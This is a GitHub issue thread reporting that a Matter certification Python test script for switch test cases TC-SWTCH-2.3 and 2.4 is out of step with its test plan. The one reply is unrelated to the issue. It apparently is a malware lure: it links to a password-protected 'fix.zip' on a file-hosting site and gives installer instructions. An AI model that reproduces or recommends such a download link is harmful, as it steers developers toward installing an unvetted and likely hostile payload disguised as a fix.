### ISSUE TITLE
[CERT-TEST-FAILURE] [TC-SWTCH-2.3, 2.4] Python script has to be aligned with Test plan.

### ISSUE THREAD

**Issue by Ashwinigrl** [project-chip/connectedhomeip#35241]
### Feature Area

Other

### Test Case

TC-SWTCH-2.3
TC-SWTCH-2.4

### Description

- [x] **TC-SWTCH-2.4**
-  In the test plan, there are test steps 6a, 6b, 6c, and 6d, but these steps are missing from the script. Additionally, test steps 5a, 5b, 5c, and 5d in the script are inconsistent with the test plan(test  step descriptions in script is not matching with test plan).

- [x] **TC-SWTCH-2.3**
- The Python script for includes a test step 8b, which is not mentioned in the test plan.

**Python script reference:**
- https://github.com/project-chip/connectedhomeip/blob/master/src/python_testing/TC_SWTCH.py

![image](https://github.com/user-attachments/assets/cdc20ce4-54cf-47f2-b437-9180f979d2e2)

**Test plan Reference:**
- https://github.com/CHIP-Specifications/chip-test-plans/blob/master/src/cluster/switch.adoc#322-tc-swtch-22-latching-switch-verification

![image](https://github.com/user-attachments/assets/2bce483b-8586-4358-a829-2fe7b89fa953)

### GitHub hash of the SDK that was being used

a296b6609ec064b201cca9880c577f0197217d43

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
